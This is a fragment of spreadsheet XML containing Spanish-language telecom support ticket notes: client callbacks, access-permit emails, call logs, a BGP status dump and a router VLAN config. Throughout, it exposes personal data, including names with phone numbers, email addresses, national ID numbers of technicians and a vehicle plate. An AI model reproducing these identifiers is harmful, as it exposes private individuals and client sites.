    <t>**SE LLAMA  A CLIENTE  LCDA. SUSY VALENCIA AL 22205923 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001920826
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LCDA. SUSY VALENCIA 22201721 CONTESTA UNA SEÑORITA QUIEN SOLICITA QUE SE LE LLAME AL NUMERO  22205923 **
ID 3001919262
**</t>
  </si>
  <si>
    <t>F4628491</t>
  </si>
  <si>
    <t>SE LLAMA  SR. JOSE CORDON 84724690 VALIDA ENLACE, SE PROCEDE AL CIERRE DEL INCIDENTE, ID: 1001193053.</t>
  </si>
  <si>
    <t>F4628506</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSE MONTERROSA 78027898 INFORMA QUE EL PUNTO REMOTO YA SE RETIRO, SOLICITA REGRESAR LA LLAMADA MAÑANA 08:30 AM PARA VALIDAR ENLACE.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO TIENE SALIDA HACIA INTERNET  REALIZA TRAZA HACIA EL SERVICIO Y OBSERVA QUE SE QUEDA EN WAN ESTAS PRUEBAS REALIZANDOLAS DESDE EL FORTINET CLIENTE INDICA QUE PARA PRUEBAS VALIDARA SI HAY ALGUIEN DEL PERSONAL PERO SOLICITA LLAMADA A LAS 14:00 HORAS
10.142.223.70 - QUE INDICA QUE ES LA WAN PRINCIPAL DE LA WAN</t>
  </si>
  <si>
    <t>F4628519</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE RODRIGUEZ AL 30337011 INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001871976
**</t>
  </si>
  <si>
    <t>F4628528</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRUNO GONZALEZ AL 48050693  SE CONTACTA A CLIENTE Y SE DEJA EN LINEA
CON GESTOR **
-ID 3001878620
**</t>
  </si>
  <si>
    <t>F4628530</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA ## SAUL ENRIQUEZ-54891063##  VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL ENRIQUEZ-54891063 INDICA QUE EN ESTE MOMENTO ESTA TRAMITANDO LOS PERMISOS##
3001877219
COLA:
NOMBRE: A: 54891063
NÚMERO: 54891063
DURACIÓN: 0:01:14
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 54891063
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 10:49:10</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE SAUL ENRIQUEZ-54891063 ## SE LE PIDE APOYO PARA QUE EL EDIFICIO AGILICE EL PROCESO  PARA TRABAJAR##VIVO</t>
  </si>
  <si>
    <t>SAUL ENRIQUEZ-54891063 ##  SE TIENE EN LINEA ## SE LE COMENTA EL CASO ##  QUEDA ENTERADO ##
3001921795
COLA:
NOMBRE: A: 54891063
NÚMERO: 011 50254891063
DURACIÓN: 0:01:46
ESTADO: CONECTADA
DETALLES: +50254891063
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 13:00:13</t>
  </si>
  <si>
    <t>## SE HA ENVIADO CORREO A CLIENE POR MEDIO DE CORREO##A  LA ESPERA.
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MARTES, 5 DE JULIO DE 2022 10:45
PARA: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SAUL.ENRIQUEZ@SOPORTEISO.COM &lt;SAUL.ENRIQUEZ@SOPORTEISO.COM&gt;; CONSUELO.ORELLANA@SOPORTEISO.COM &lt;CONSUELO.ORELLANA@SOPORTEISO.COM&gt;; MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 25094000 || IT CONSULTING LATAM, S.A._
BUENA TARDE ESTIMADOS, CON RESPECTO AL E1:
GDN 25094000
IT CONSULTING LATAM, S.A._
12 CALLE 2-04, ZONA 9 EDIFICIO PLAZA DEL SOL OFICINA 405
SOLICITO SU APOYO PARA EL TRAMITE DE PERMISOS CORRESPONDIENTES HACIA NUESTRO TÉCNICO:
JAVIER DANILO CHETE CHAJON¿¿¿¿DPI 2149 40594 0103¿¿¿¿
VEHÍCULO CON NÚMERO DE PLACA:
¿P-0275HNJ
FAVOR CONFIRMAR EL ACCESO POR ESTE MEDIO.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS!</t>
  </si>
  <si>
    <t>###CLIENTE CONFIRMA PERMISOS##  SE PROCEDE A APERTURAR WO
DE: SAUL ENRIQUEZ &lt;SAUL.ENRIQUEZ@SOPORTEISO.COM&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 10:56
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CONSUELO ORELLANA &lt;ASISTENTEADMON@SOPORTEISO.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: GDN 25094000 || IT CONSULTING LATAM, S.A._
BUENOS DÍAS MARIA, GUSTO DE SALUDARLE.
LE COMENTO QUE YA ESTÁ AUTORIZADO EL PERMISO.</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA SAUL ENRIQUEZ-54891063 -- ##
3001866172
COLA:
NOMBRE: A: 54891063
NÚMERO: 011 50254891063
DURACIÓN: 0:00:52
ESTADO: CONECTADA
DETALLES: +50254891063
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 10:18:26</t>
  </si>
  <si>
    <t>###CLIENTE SE ESTA TRATANDO DE CONTACTAR A PUNTO REMOTO## MANTENEMOS CASO EN PC  DEBIDO A QUE SE ESTA CONTACTANDO A PR</t>
  </si>
  <si>
    <t>CLIENTE VALIDA ## SE POROCEDE ASL CIERRE##</t>
  </si>
  <si>
    <t>F4628543</t>
  </si>
  <si>
    <t>** SE VALIDA EN TT ANTERIORES, SE UBICA EL NUMERO DE LUIS PAREDES  1755  EXTENSIÓN: 60010, NO RESPONDE, VIA MAIL AUN NO SE TIENE RESPUESTA, SE LLAMARA LUEGO -*
3001902010
3001902318</t>
  </si>
  <si>
    <t>F4628544</t>
  </si>
  <si>
    <t>F4628548</t>
  </si>
  <si>
    <t>CLIENTE HABÍA CONTESTADO EL CORREO DE CNOC CLARO CON LO SIGUIENTE, SE PIDE APOYO A CNOC VÍA TEAMS PARA CONFIRMAR LO DICHO:
DE: LUIS A. PAREDES (ATI DE TELECOMUNICACIONES Y SEGURIDAD TI) [MAILTO:LUIS_PAREDESF@BANTRAB.NET.GT]
ENVIADO EL: MARTES, 5 DE JULIO DE 2022 14:21
ASUNTO: RE: REVISION DE ENLACES
BUENAS TARDES LA VISITA SERÍA PARA MAÑANA 06/07/2022?
SALUDOS CORDIALES,
LUIS ARTURO PAREDES FERNÁNDEZ
ANALISTA TÉCNICO I DE TELECOMUNICACIONES Y SEGURIDAD TI
REDESYSEGURIDADTI@BANTRAB.NET.GT</t>
  </si>
  <si>
    <t>NO SE LOGRARON REALIZAR PRUEBAS YA QUE CLIENTE INFORMA QUE SU ENCARGADO QUE TIENE EL ACCESO AL RACK LE INFORMA QUE REGRESARA LA LLAMADA AL TENER EL ACCESO.</t>
  </si>
  <si>
    <t>F4628564</t>
  </si>
  <si>
    <t>SE LLAMA A CLAUDIA PARA VALIDARA SERVICIO YA QUE POR PARTE DE CLARO NO SE TIENE AFECTACION- SE TIENE COMUNICION LAN TO LAN SIN EMABRGO NO RESPONDE.
BGP NEIGHBOR IS 10.152.146.193,  REMOTE AS 22833, EXTERNAL LINK
  BGP VERSION 4, REMOTE ROUTER ID 10.179.30.36
  BGP STATE = ESTABLISHED, UP FOR 14:14:18
  LAST READ 00:00:07, LAST WRITE 00:00:16, HOLD TIME IS 90, KEEPALIVE INTERVAL IS 30 SECONDS
  NEIGHBOR SESSIONS:</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ING. CLAUDIA CECILIA MALDONADO 71678297 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001906475</t>
  </si>
  <si>
    <t>F4628567</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 25912144 SE LE EXPLICA A CLIENTE QUE EL REPORTE LO REALIZO LA CENTRAL, CLIENTE SE NIEGA A REALIZAR PRUEBAS PORQUE OBSERVAN QUE TODO ESTA BIEN, SE LE INDICA QUE POSIBLEMENTE ESTEN TRABAJANDO BAJO UN SERVICIO REDUNDANTE PERO CLIENTE INSISTE EN QUE NO VA APOYAR Y SOLICITA VISITA TECNICA
-ID 3001885580
NOMBRE DEL CLIENTE: INSTITUTO SALVADORENO DEL SEGURO SOCIAL
UBICACIÓN: COLONIA MIRAMONTE AVENITA CIERRA NEVADA, SAN SALVADOR
CONTACTO EN SITIO: ENCARGADO DE TURNO
HORARIO DE ATENCION:7:00 - 18:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 25912144 CONTESTA L SEÑORITA LIC VASQUEZ QUIEN INDICA QUE PODRAN ATENDER A LAS 13:00 HRS **
-ID 3001902672
**</t>
  </si>
  <si>
    <t>F4628572</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO AETHRA 6044, SE APAGA Y SE BOTA EL REGISTRO EN CENTRAL, AL CARGAR AETHRA AÚN NO SE REGISTRA, SE CONTINÚA EN PRUEBAS. ID: 3001894780</t>
  </si>
  <si>
    <t>F4628573</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HUGO GEOVANI GONZALES AL 22040800  INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 3001884000
**</t>
  </si>
  <si>
    <t>F4628575</t>
  </si>
  <si>
    <t>*** LESBIA LOPEZ 22040404 (CLIENTE) CONFIRMA LA RECEPCION DEL CORREO, INFORMA QUE YA LO ESCALARON Y ESTAN A LA ESPERA QUE SEA AUTORIZADA LA VISITA, NOS ESTARÁN COMPARTIENDO LA AUTORIZACION VIA CORREO -*
-*</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // QUEDAMOS A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 13:01
PARA: ADM711@COFAL.COM.GT &lt;ADM711@COFAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 673000040T | COFINO STAHL Y COMPANIA, SOCIEDAD
 BUEN TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO AL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO .
DIRECCIÓN:  KM 17.5 CARRETERA A EL SALVADOR COLONIA ARRAZOLA I
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
IVAN ALEXANDER ARRAZONA TUN¿¿¿951913¿¿¿¿¿¿2319 45019 0101
BYRON ALFONSO CUTZAL MORALES¿¿535274¿¿¿¿¿¿1689 67987 0101
QUEDAMOS ATENTOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4628616</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
POSIBLE FALLA DE ENERGIA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: MARTES, 5 DE JULIO DE 2022 11:15PARA: USCTELECOMUNICACIONES@ICASA.COM.GT &lt;USCTELECOMUNICACIONES@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;; TELECOMUNICACIONES VPC &lt;TELECOMVPC@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8616
ID: 405900004T
IDENTIFICADOR DEL CLIENTE: CC_CERVECERIA_GT_AGENCIA_PLAYA_GRANDE
UBICADO EN: ALDEA SAN FRANCISCO IXCAN QUICHE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4628625</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO CASTRO 26412251 / 72388759 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001959043 - 3001959300</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO CASTRO 72388759 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001928970
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO CASTRO 72388759 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001908130</t>
  </si>
  <si>
    <t>F4628632</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ENIS CRUZ 24432112 EXT 116 CONTESTA SRTA, GLENDA FUNEZ INFORMA QUE EL SR. CRUZ QUE SE ENCUENTRA EN UNA REUNION, NOS PODRA ATENDER A LAS 2 PM...</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE ENIS CRUZ  94509354 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001916472</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 12:47
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; ENIS GABRIEL CRUZ RODRIGUEZ &lt;ENISCRUZ@COOPERATIVACEIBENA.HN&gt;; PEREZ ZAPATA, DUNIA YAHAYRA &lt;DUNIA.PEREZ@CLARO.COM.HN&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE DATOS FILIAL ESTADIO
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
FAVIO SANTOS              1807-1993-00740
OMAR GUARDADO      0413-1984-00606
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, FAVOR INFORMAR DÍA Y HORA AUTORIZADOS PARA EL ACCESO Y AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS.
ADICIONAL SOLICITAMOS NOS PUEDA COMPARTIR EL CONTACTO DE LA PERSONA QUE ESTARÁ ATENDIENDO A PERSONAL TÉCNICO EN PUNTO REMOTO.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4628639</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL AREVALO AL 61833048 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001892851
**</t>
  </si>
  <si>
    <t>F4628646</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HERBER GARZONA 24526540 MENCIONA QUE DESDE LA OFICINA CENTRAL LE INDICARON QUE CLARO BLOQUEO LA PAGINA SRT.MART.GOB.SVBLECASARCOTA-RM SE LE INFORMA QUE A NIVEL DE CLARO YA SE ESCALO PERO NO SE TIENE NINGUN PROBLEMA
SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001909521</t>
  </si>
  <si>
    <t>F4628649</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINA POP-55230942 ## NO RESPONDE## SE INTANTETARA NUEVMENTE EN BREVE##
3001927749
COLA:
NOMBRE: A: 55230942
NÚMERO: 55280199
DURACIÓN: 0:00:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 13:19:00
3001927925
COLA:
NOMBRE: A: 55230942
NÚMERO: 55280199
DURACIÓN: 0:00:15
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 13:19:05</t>
  </si>
  <si>
    <t>DINA POP-55230942 ##  CLIENTE INDICA QUE EN ESTE MOMENTO NO TIENE SERVICIO##
RESULTADO: LLAMADA HECHA
NOMBRE: 55230942
NÚMERO: 011 50255230942
INICIO: HOY, 11:31
FIN: HOY, 11:33
DURACIÓN: 2:01
ID DE LLAMADA: 3001893104</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINA POP-55230942 NO RESPONDE, ENVIA A BUZON
-ID 3001928412 - 3001928523</t>
  </si>
  <si>
    <t>F4628653</t>
  </si>
  <si>
    <t>***--- SEGUIMIENTO EN HORARIO HABIL CON PR PARA REALIZAR MAS PRUEBAS YA QUE POR ALTA DEMANDA NO PUDO FINALIZAR LAS MISMAS AYER --**</t>
  </si>
  <si>
    <t>F4628667</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 56982176 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001920222</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 56982176 JENIFER SAY CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001927778
**</t>
  </si>
  <si>
    <t>F4628673</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 71406428  - 74744999 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001068432 - 1001068868
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL RAMIREZ AL 71406428 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001090267
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL RAMIREZ 71406428 - 74744999 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001913639 - 3001914141</t>
  </si>
  <si>
    <t>CLIENTE INFORMA QUE PODRA REALIZAR PRUEBAS A LAS 3PM, TOMAR EN CUENTA QUE A NIVEL DE CLARO, ESTE ENLACE CONTINUA OPERATIVO.</t>
  </si>
  <si>
    <t>F4628683</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA REVISION A NIVEL LAN
RE: GRUPO MEYKO-PLAN INTERNET</t>
  </si>
  <si>
    <t>F4628689</t>
  </si>
  <si>
    <t>SE HABLA CON OSCAR GODOY 47538013 SE LE INFORMA QUE PERSONA CONTRATISTA ESTÁ REALIZANDO CAMBIO DE EQUIPOS. CLIENTE INDICA QUE EFECTIVAMENTE EL TÉCNICO LLEGÓ A CAMBIAR EL CONVERTIDOR DE FIBRA Y EL SERVICIO DE INTERNET Y E1 YA ESTÁN NUEVAMENTE OPERATIVOS. CLIENTE AGRADECE Y AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001906929</t>
  </si>
  <si>
    <t>F4628694</t>
  </si>
  <si>
    <t xml:space="preserve"> OLIVER-30224426  SE TIENE A CLIENTE EN LINEA  ##
3001913290
COLA:
NOMBRE: A: 30224426
NÚMERO: 011 50230224426
DURACIÓN: 0:00:59
ESTADO: CONECTADA
DETALLES: +50230224426
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 12:33:00</t>
  </si>
  <si>
    <t>SE HABLA CONC LINEETE- OLIVER-30224426 INDICA QUE TUVO PROBLEMAS PARA QUE PERSONAL ENTENDIERA QUE ES UNA EMERGENCIA Y  DEJARA INGRESAR A TECNICOS- COMENTA QUE ESTA GESTIONANDO LOS PERMISOS PARA NUESTROS TECNCIOS.
OLIVER-30224426
RESULTADO: LLAMADA HECHA
NOMBRE: 30224426
NÚMERO: 011 50230224426
INICIO: HOY, 13:24
FIN: HOY, 13:25
DURACIÓN: 0:52
ID DE LLAMADA: 3001929706</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAMES GRIJALBA-30319629   ##
3001911509
COLA:
NOMBRE: A: 30319629
NÚMERO: 30319629
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 30319629
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 5/07/2022 12:26:12</t>
  </si>
  <si>
    <t>F4628700</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALFRED CHULI 59136024 MENCIONA QUE TODO ESTA BIEN CON LA ENERGIA ADICIONAL INDICA QUE YA APLICO REINICIO PERO EL INCONVENIENTE PERSISTE
-ID 3001924821
NOMBRE DEL CLIENTE: PROVEEDORA VIAL, SOCIEDAD ANONIMA
UBICACIÓN:PARQUE INDUSTRIAL LAS AMERICAS VILLA NUEVA KM17.5 CARR A MAYAN GOLF 16 AV Z4 VILLA NUEVA
CONTACTO EN SITIO: WALFRED CHULI 59136024
HORARIO DE ATENCION:HASTA LAS 17:00
GESTIÓN DE PERMISOS:UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4628703</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. VICTOR TECUN 37610279 SOLICITA LLAMAR EN 15 MINS. SE LE INFORMA QUE SU AP INTERNO ESTUVO CAENDO Y LEVANTANDO....</t>
  </si>
  <si>
    <t>CLIENTE SR. VICTOR TECUN 37610279 INFORMA QUE REVISA SU RED INTERNA, ENVIARA TECNICO YA QUE SU EQUIPO INTERNO AUN NO RESPONDE Y SE CONFIRMO QUE LA MAC DE SU EQUIPO SI LLEGA AL CPE, SE INFORMA QUE LOS PUERTOS DE LA TARJETA HWIC SON POE, CONFIRMA DE ENTERADO REVISARA SU RED INTERNA CON TECNICO INTERNO, EN EL TRANSCURSO DEL DIA, SE PROCEDE AL CIERRE DEL INCIDENTE...</t>
  </si>
  <si>
    <t>F4628707</t>
  </si>
  <si>
    <t>SE LLAMAMA A CLIENTE SR. OTTO PERALTA 54136232 SOLICITA REALIZAR CAMBIO DE SEGMENTO LAN: 10.2.248.100/24, SE CONFIGURA SEGMENTO LAN EN VL1 CPE HUAWEI.
[V200R009C00SPC500]
#
INTERFACE VLANIF1
 IP ADDRESS 10.2.248.100 255.255.255.0
 DHCP SELECT INTERFACE
#
RETURN</t>
  </si>
  <si>
    <t>F4628721</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARINA RAMIREZ 77772531 CONTESTA NANCY, VALIDA SERVICIO Y AUTORIZA CIERRE DE TICKET
1001007310
COLA:
NOMBRE: A: 77772531
NÚMERO: 77772531
DURACIÓN: 0:01:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 77772531
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 5/07/2022 18:08:19</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KARINA RAMIREZ   77772531 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 3001940047
**</t>
  </si>
  <si>
    <t>F4628741</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISMARI DE LOPEZ AL 23345027 CONFIRMA SERVICIO ESTABLE Y OPERATIVO INDICA QUE EL PROBLEMA ERA INTERNAMENTE**
-ID 3001968785
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISMARI DE LOPEZ AL 23345027 SOLICITA QUE SE LE LLAME A LAS 15:00 HRS YA QUE VAN A REVISAR INTERNAMENTE **
-ID 3001943030
**</t>
  </si>
  <si>
    <t>F4628747</t>
  </si>
  <si>
    <t>SE REVISA NUEVAMENTE EL ENLACE, SE OBSERVA YA ESTABLE, SE ENVIA CORREO A CLIENTE.
ENLACE INESTABLE Y BW INCORRECTO DE MXM HEREDIA SUR ID: CONTR0001457091OC</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  2243-7253 CONTESTA EL SEÑOR JEFERSON ARCE CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET SOLO SOLICITA QUE SE LE ENVIE POR CORREO SI SE REALIZO ACCION CORRECTIVA**
-ID 1001070297
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR JEFERSON ARCE SOLICITA QUE SE LLAME EN 30 MIN NUEVAMENTE **
-ID 3001945109
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON DIEGO MORA/CLIENTE 2243-7253 INDICA ENLACE MEJORÓ, PIDE SE MANTENGA EN MONITOREO PARA MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4628749</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL DIAZ AL 72742051 INDICA QUE AHORITA ESTA ESTABLE EL SERVICIO PERO POR MOMENTOS SE PIERDE LA SEÑAL SE CAE EL SERVICIO || SE NOTIFICA A GESTOR **
-ID 3001946513  - 3001946998
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL DIAZ AL 72742051 NO RESPONDE ||ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001072101
**</t>
  </si>
  <si>
    <t>F4628751</t>
  </si>
  <si>
    <t>**SE LLAMA A PR 22506765  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001973751
**</t>
  </si>
  <si>
    <t>F4628754</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES  45787911  INDICA SE  PROCEDA CON EL CIERRE DE TICKET
-ID 1001003333</t>
  </si>
  <si>
    <t>F4628772</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
SOLICITUD DE ACCESOS || F4627461 || AGENCIA 824</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE DESEA SABER CUAL ES EL INCONVENIENTE, SE LE INDICA QUE CNOC RESPONDERÁ*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 5 DE JULIO DE 2022 13:35
PARA: AGE824 - SANTA MARIA CHIQUIMULA &lt;AGE824@BANRURAL.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; 'TIC ORELLANA, FRANKLIN' &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; 'TIC-TELECOM@BANRURAL.COM.GT' &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; 'TIC GONZÁLEZ, ANIBAL' &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'AGE824.PLATAFORMA - SANTA MARIA CHIQUIMULA' &lt;AGE824.PLATAFORMA@MAILPRIVADO.BDR&gt;; JAIME.GARCIA@BANRURAL.COM.GT
ASUNTO: RE: SOLICITUD DE ACCESOS || F4627461 || AGENCIA 824
BUENAS TARDES ASTRID,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA LAS VERIFICACIONES, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-------------------------
DE: AGE824 - SANTA MARIA CHIQUIMULA [MAILTO:AGE824@BANRURAL.COM.GT]
ENVIADO EL: MARTES, 5 DE JULIO DE 2022 13:04
